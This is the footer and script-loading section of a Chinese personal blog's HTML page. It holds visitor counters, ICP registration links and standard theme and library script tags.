        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      浙ICP备2021025197号-1
    </a>
  </span>
  
    
      <span>
        <a
          href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=33048202000536"
          rel="nofollow noopener"
          class="beian-police"
          target="_blank"
        >
          
            <span style="visibility: hidden; width: 0">|</span>
            <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
          
          <span>浙公网安备33048202000536号</span>
        </a>
      </span>
    
  
</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/caidai.js"></script>
<script src="//paste.vaala.cloud/raw/siqopubiwi.js"></script>
<script src="/js/APlayer.min.js"></script>
<script src="//url.wuuconix.link/live2d.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
